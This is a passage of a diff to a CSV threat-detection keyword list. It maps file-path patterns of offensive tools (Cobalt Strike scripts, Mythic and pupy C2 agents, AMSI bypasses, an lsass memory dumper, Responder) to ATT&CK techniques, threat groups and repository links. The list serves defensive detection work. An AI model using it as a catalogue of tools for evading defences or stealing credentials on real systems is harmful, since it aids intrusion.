TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/dll.go*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/merlin.*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*/agent_code/powershell_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/agent_code/sh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/agent_code/zsh_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/agent_functions/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/agent_icons/athena.svg*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/AggressiveClean.cna*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*/aggressor/*.java*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/agent_functions/*.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/agent_icons/athena.svg*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/AggressiveClean.cna*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/aggressor/*.java*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/aggressor-powerview*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" 
"*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" "*/AggressorScripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/agscript *","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/agscript *","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. 
setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/agscript *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ahmedkhlief/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/ahrixia/CVE_2022_0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" 
@@ -2650,21 +2653,21 @@ "*/Alcatraz/files/*/Alcatraz.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz/x64*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/Alcatraz-gui*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"*/all/pupyutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/all/pupyutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amass/wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/amsi.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/amsi.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/Amsi_Bypass_In_2023*","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","3","275","48","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*/AMSI_patch.git*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" 
"*/Amsi-Killer.git*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*/AmsiOpenSession.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" -"*/Analyzer-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/Analyzer-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/AndrewSpecial.git*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" -"*/android/pupydroid/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/android/pupydroid/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - 